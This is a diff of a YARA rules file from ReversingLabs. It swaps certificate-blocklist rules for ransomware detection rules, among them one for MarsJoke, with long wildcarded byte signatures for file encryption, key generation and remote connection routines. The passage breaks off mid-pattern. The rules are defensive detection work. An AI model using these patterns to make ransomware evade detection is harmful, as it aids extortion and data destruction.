?? ?? ?? ?? + E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 33 C0 53 51 66 89 84 24 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 33 D2 53 50 66 89 54 + 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 33 C9 53 52 66 89 + 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 47 ?? 83 C4 ?? 50 89 5C 24 ?? 89 44 24 ?? E8 ?? + ?? ?? ?? 53 53 8D 84 24 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 EC ?? 8B + } + $encrypt_files_p2 = { + F4 33 C9 8D 84 24 ?? ?? ?? ?? C7 46 ?? ?? ?? ?? ?? 89 5E ?? 89 64 24 ?? 66 89 4E ?? + 8D 50 ?? 90 66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B C2 D1 F8 50 8D 84 24 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 6A ?? 8D 94 24 ?? ?? ?? ?? 52 53 FF 15 ?? ?? ?? ?? + 85 C0 74 ?? 83 EC ?? 8B F4 33 C0 C7 46 ?? ?? ?? ?? ?? 89 5E ?? 66 89 46 ?? 8D 84 24 + ?? ?? ?? ?? 89 64 24 ?? 8D 50 ?? EB ?? 8D 49 ?? 66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B + C2 D1 F8 50 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 53 6A ?? 8D 8C 24 + ?? ?? ?? ?? 51 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 EC ?? 8B F4 33 D2 C7 46 ?? ?? ?? + ?? ?? 89 5E ?? 8D 84 24 ?? ?? ?? ?? 66 89 56 ?? 89 64 24 ?? 8D 50 ?? EB ?? 8D 49 ?? + 66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B C2 D1 F8 50 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 57 E8 ?? ?? ?? ?? 53 6A ?? 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? + ?? ?? 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 EC ?? 8B F4 33 D2 C7 46 ?? ?? + ?? ?? ?? 89 5E ?? 8D 44 24 ?? 66 89 56 ?? 89 64 24 ?? 8D 50 ?? 8D A4 24 ?? ?? ?? ?? + 66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B C2 D1 F8 50 8D 44 24 ?? E8 ?? ?? ?? ?? 57 E8 ?? + ?? ?? ?? 53 6A ?? 8D 84 24 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 68 ?? ?? + ?? ?? 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 EC ?? 8B F4 33 D2 C7 + } + $encrypt_files_p3 = { + 46 ?? ?? ?? ?? ?? 89 5E ?? 8D 84 24 ?? ?? ?? ?? 66 89 56 ?? 89 64 24 ?? 8D 50 ?? 90 + 66 8B 08 83 C0 ?? 66 3B CB 75 ?? 2B C2 D1 F8 50 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 57 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8D 44 24 ?? 50 53 6A ?? 53 53 53 68 ?? ?? ?? ?? + 68 ?? ?? ?? ?? 89 5C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 4C 24 ?? 51 FF 15 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B F8 53 + 57 E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8D 54 + 24 ?? 52 57 8B CE E8 ?? ?? ?? ?? 8B 74 24 ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4 + ?? 8D 74 24 ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 50 E8 ?? + ?? ?? ?? 83 C4 ?? 8B 8C 24 ?? ?? ?? ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 8C 24 ?? + ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $generate_key = { + 50 C7 44 24 ?? ?? ?? ?? ?? F3 A5 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ?? ?? ?? + ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 8B 44 24 ?? 8D 4C 24 ?? 51 + 6A ?? 6A ?? 6A ?? 8D 54 24 ?? 52 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ?? ?? + ?? ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 8B 54 24 ?? 6A ?? 8D 4C + 24 ?? 51 6A ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ?? ?? ?? ?? 5B 8B 4C 24 + ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 8B 54 24 ?? 6A ?? 8D 44 24 ?? 50 8D 4C 24 + ?? 51 6A ?? 52 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ?? + ?? ?? ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 8B 44 24 ?? C1 E8 ?? + 89 44 24 ?? 03 C3 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? 5F 5E 5D B8 ?? ?? ?? + ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ?? ?? 83 C4 ?? C2 ?? ?? 53 55 56 E8 ?? ?? ?? ?? 8B + 4C 24 ?? 83 C4 ?? 89 5C 24 ?? 83 C3 ?? 53 8D 44 24 ?? 50 56 6A ?? 6A ?? 6A ?? 51 FF + 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5D B8 ?? ?? ?? ?? 5B 8B 4C 24 ?? 33 CC E8 ?? ?? ?? + ?? 83 C4 ?? C2 ?? ?? 8B 7C 24 ?? 8B 54 24 ?? 57 56 52 E8 ?? ?? ?? ?? 8B 44 24 ?? 56 + 89 38 E8 ?? ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 5F 5E 5D 5B 33 CC 33 C0 E8 ?? ?? ?? ?? 83 + C4 ?? C2 + } + $remote_connection = { + 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 57 8D 44 24 ?? 50 68 ?? + ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 89 46 ?? 83 + F8 ?? 74 ?? 8B 46 ?? 8D 7E ?? 83 E8 ?? 83 78 ?? ?? 7E ?? 8B 48 ?? 51 8B CF E8 ?? ?? + ?? ?? 8B 3F 57 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 8D 54 24 ?? 52 89 44 24 ?? FF 15 ?? ?? + ?? ?? 85 C0 75 ?? 8B 46 ?? 50 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 C0 5F 8B 8C 24 + ?? ?? ?? ?? 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 8B 48 ?? 8B 11 8B 02 0F B7 56 + ?? B9 ?? ?? ?? ?? 52 89 44 24 ?? 66 89 4C 24 ?? FF 15 ?? ?? ?? ?? 8B 4E ?? 66 89 44 + 24 ?? 6A ?? 8D 44 24 ?? 50 51 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? FF 15 ?? ?? ?? ?? 8B + 56 ?? 52 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 33 C0 5F 8B 8C 24 ?? ?? ?? ?? 33 CC E8 + ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 8B 8C 24 ?? ?? ?? ?? 5F 33 CC B8 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Adobe Systems" and pe.signatures[i].serial=="4b:a7:fb:8e:e1:de:ff:8f:4a:15:25:e1:e0:58:00:57" and 1341792000<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($enum_shares) and ( all of ($find_files_p*)) and ($generate_key) and ( all of ($encrypt_files_p*)) and ($remote_connection) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_2Df9F7Eb6Cdc5Ca243B33122E3941E25 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Marsjoke : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "The digital certificate has leaked." + description = "Yara rule that detects MarsJoke ransomware." author = "ReversingLabs" - id = "da1895fd-ec29-513d-b8ae-2317f84b8280" - date = "2023-11-08" - modified = "2023-11-08" + id = "8164c586-f548-5414-9df8-61e0c51cbe29" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1344-L1360" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "703eccd5573fe42f03ec82887660d50e942156d840394746c90ba87d82507803" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.MarsJoke.yara#L1-L157" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "298b2fd99793a15b3537853289e1337648d3fa84f12038e6f6831741404b7c5c" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "MarsJoke" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Adobe Systems" and pe.signatures[i].serial=="2d:f9:f7:eb:6c:dc:5c:a2:43:b3:31:22:e3:94:1e:25" and 1341792000<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_58A541D50F9E2Fab4380C6A2Ed433B82 : INFO FILE -{ - meta: - description = "The digital certificate has leaked." - author = "ReversingLabs" - id = "19a26581-5c94-5c8d-8e3e-b2ef1d770968" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L1362-L1378" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "69ddc58b6fec159d6eded8c78237a6a0626b1aedb58b0c9867b758fd09db46ad" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $search_and_encrypt_files = { + 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 8B 45 + ?? 53 56 89 44 24 ?? 8B 45 ?? 57 89 44 24 ?? 8B 45 ?? BE ?? ?? ?? ?? 33 DB 56 89 44 + 24 ?? 8D 84 24 ?? ?? ?? ?? 8B F9 53 50 89 7C 24 ?? 66 89 9C 24 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 83 C4 ?? 56 8D 84 24 ?? ?? ?? ?? 53 50 66 89 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 57 8D 4C 24 ?? 88 5C 24 ?? E8 ?? + ?? ?? ?? 83 C4 ?? 84 C0 0F 85 ?? ?? ?? ?? 38 5C 24 ?? 0F 85 ?? ?? ?? ?? 8D 84 24 ?? + ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 59 59 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 + 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 59 59 BE ?? ?? ?? + ?? 56 8D 84 24 ?? ?? ?? ?? 50 FF D7 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 56 FF + 74 24 ?? FF D7 FF 74 24 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 + ?? 84 C0 8D 84 24 ?? ?? ?? ?? 75 ?? 50 FF 15 ?? ?? ?? ?? FF 74 24 ?? E9 ?? ?? ?? ?? + 6A ?? 50 FF D7 53 68 ?? ?? ?? ?? 6A ?? 53 6A ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? + 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 89 44 24 ?? 75 ?? 56 8D 84 24 ?? ?? ?? ?? 50 FF D7 8D + 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E9 ?? ?? ?? ?? 8D 4C + 24 ?? 51 50 FF 15 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF 74 24 ?? FF 74 24 ?? E8 ?? ?? ?? + ?? 89 5C 24 ?? 33 DB 68 ?? ?? ?? ?? 89 44 24 ?? 8D 84 24 ?? ?? ?? ?? 53 50 89 54 24 + ?? 89 4C 24 ?? 66 89 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 74 24 ?? 8D 84 24 + ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 + 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 56 8D 84 24 ?? ?? ?? ?? 50 FF + D7 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 53 56 6A ?? 53 6A ?? 68 ?? ?? ?? ?? 8D + 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 89 44 24 ?? 75 ?? 56 8D 84 24 ?? ?? + ?? ?? 50 FF D7 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? E9 ?? + ?? ?? ?? 6A ?? 59 33 C0 66 89 9C 24 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? F3 AB 6A ?? FF + 74 24 ?? 66 AB 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 8D 8C 24 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BF ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? + ?? 57 53 50 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 0B 44 24 ?? 74 ?? 83 44 + 24 ?? ?? 11 5C 24 ?? EB ?? 89 7C 24 ?? 89 5C 24 ?? BF ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? + 59 50 57 8B 7C 24 ?? 57 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 89 47 ?? 8B 44 24 ?? 53 + 89 47 ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 57 FF 74 24 ?? C7 47 ?? ?? ?? ?? ?? 88 5C 24 + ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? C6 44 24 ?? ?? E9 ?? ?? ?? ?? 8B 7C 24 ?? 3B FB 89 + 5C 24 ?? 0F 8C ?? ?? ?? ?? 7F ?? 39 5C 24 ?? 0F 86 ?? ?? ?? ?? 8B 74 24 ?? 83 EE ?? + 1B FB 89 74 24 ?? 89 7C 24 ?? 89 5C 24 ?? 33 C0 EB ?? 8B 7C 24 ?? 8B 74 24 ?? 39 74 + 24 ?? 75 ?? 3B C7 75 ?? 8B 44 24 ?? 89 44 24 ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 68 ?? + ?? ?? ?? 53 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 8D 44 24 ?? 50 FF 74 24 ?? FF 74 + 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 58 39 44 24 ?? 73 ?? 89 44 24 ?? 39 74 24 + ?? 75 ?? 33 C0 3B C7 75 ?? 39 5C 24 ?? 7C ?? 7F ?? 83 7C 24 ?? ?? 76 ?? 8B 44 24 ?? + 83 E0 ?? 74 ?? 8B 4C 24 ?? 2B C8 03 C9 89 4C 24 ?? 6A ?? 68 ?? ?? ?? ?? FF 74 24 ?? + 53 FF 15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 + ?? 50 81 EC ?? ?? ?? ?? 6A ?? 59 8B FC FF B4 24 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? FF + B4 24 ?? ?? ?? ?? F3 A5 8B B4 24 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? + 53 8D 44 24 ?? 50 FF 74 24 ?? 56 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 68 ?? ?? ?? ?? + 53 56 74 ?? FF 15 ?? ?? ?? ?? FF 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 33 C0 3B 44 24 ?? + 0F 8C ?? ?? ?? ?? 7F ?? 8B 4C 24 ?? 3B 4C 24 ?? 0F 82 ?? ?? ?? ?? EB ?? C6 44 24 ?? + ?? FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 74 24 ?? FF 15 ?? ?? ?? ?? + FF 74 24 ?? 8B 3D ?? ?? ?? ?? FF D7 FF 74 24 ?? FF D7 56 8D 84 24 ?? ?? ?? ?? 50 FF + 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 38 5C 24 ?? 8D 84 24 + ?? ?? ?? ?? 75 ?? 6A ?? FF 74 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 FF 74 24 ?? 68 ?? ?? + ?? ?? 75 ?? E8 ?? ?? ?? ?? 59 59 8D 84 24 ?? ?? ?? ?? 50 FF D6 EB ?? E8 ?? ?? ?? ?? + 59 59 B0 ?? EB ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 32 C0 8B 8C 24 ?? ?? ?? ?? + 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $remote_connection_2 = { + 55 8D 6C 24 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? + 53 56 57 BE ?? ?? ?? ?? 56 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 04 + 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 56 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 83 A5 ?? + ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? + ?? BE ?? ?? ?? ?? 56 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 FF B5 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? + E8 ?? ?? ?? ?? 6A ?? 6A ?? 8B C3 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? + ?? 57 E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A + ?? 8D 5D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? + ?? ?? 56 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 83 A5 ?? ?? ?? ?? ?? BF ?? ?? ?? ?? 57 + 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? + 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? + ?? ?? 50 E8 ?? ?? ?? ?? 66 83 A5 ?? ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? + ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85 + ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A + ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 8D 85 + ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B C3 + 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? + ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50 + E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 + FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 59 59 5F 5E 5B 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 59 83 BD ?? ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 4D ?? 8B 85 ?? + ?? ?? ?? 33 CD E8 ?? ?? ?? ?? 83 C5 ?? C9 C3 + } + $remote_connection_1 = { + 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 8D 85 + ?? ?? ?? ?? 50 8B F9 8B F2 68 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? FF 15 + ?? ?? ?? ?? 33 DB 53 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 89 85 ?? ?? ?? ?? 66 C7 85 + ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 + 88 1F 50 88 1E 66 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D + 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 38 9D ?? ?? ?? + ?? 59 59 75 ?? 68 ?? ?? ?? ?? C6 07 ?? E8 ?? ?? ?? ?? 59 E9 ?? ?? ?? ?? 8D 85 ?? ?? + ?? ?? 50 E8 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 59 89 85 ?? ?? ?? ?? 33 F6 BB ?? ?? ?? ?? + 56 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF B5 + ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 56 53 E8 ?? ?? ?? ?? FF 85 ?? ?? ?? ?? + 46 83 FE ?? 59 59 7C ?? EB ?? 53 E8 ?? ?? ?? ?? 59 83 BD ?? ?? ?? ?? ?? 7C ?? C6 07 + ?? 53 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 F6 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50 66 + 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? + 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF + B5 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 56 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 50 FF + B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 56 68 + ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? FF 15 ?? ?? + ?? ?? 3B C6 0F 8E ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 89 B5 ?? ?? ?? ?? 0F 84 ?? + ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 83 8D ?? ?? ?? ?? ?? 56 E8 ?? ?? + ?? ?? 59 50 56 8D B5 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 8B C8 85 C9 + 89 8D ?? ?? ?? ?? 7D ?? C6 07 ?? 51 E9 ?? ?? ?? ?? 83 F9 ?? 0F 8C ?? ?? ?? ?? 83 BD + ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 66 83 A5 ?? ?? ?? ?? ?? 33 C0 8D BD ?? ?? ?? ?? 66 + AB 40 3B C8 89 85 ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 68 ?? ?? ?? ?? FF + B5 ?? ?? ?? ?? 8D 47 ?? E8 ?? ?? ?? ?? 85 C0 59 59 0F 85 ?? ?? ?? ?? 8B 77 ?? 2B 37 + 8D 46 ?? 50 E8 ?? ?? ?? ?? 59 56 6A ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 07 8B + 8D ?? ?? ?? ?? 83 C4 ?? 03 C8 51 8B 4F ?? 2B C8 51 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 8D ?? ?? ?? ?? + E8 ?? ?? ?? ?? 59 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 59 40 50 E8 + ?? ?? ?? ?? 59 FF B5 ?? ?? ?? ?? 8B F0 6A ?? 56 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 + C4 ?? FF B5 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 56 53 C6 04 06 ?? + E8 ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 83 8D ?? ?? ?? ?? ?? 56 E8 + ?? ?? ?? ?? 83 C4 ?? 50 56 8D B5 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 + 3B C6 59 59 0F 8C ?? ?? ?? ?? 83 F8 ?? 0F 8C ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 85 + ?? ?? ?? ?? 83 F8 ?? 7E ?? 48 8D B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF + B5 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 85 C0 59 59 75 ?? 8B 06 8B 8D ?? ?? ?? ?? 03 + C8 51 8B 4E 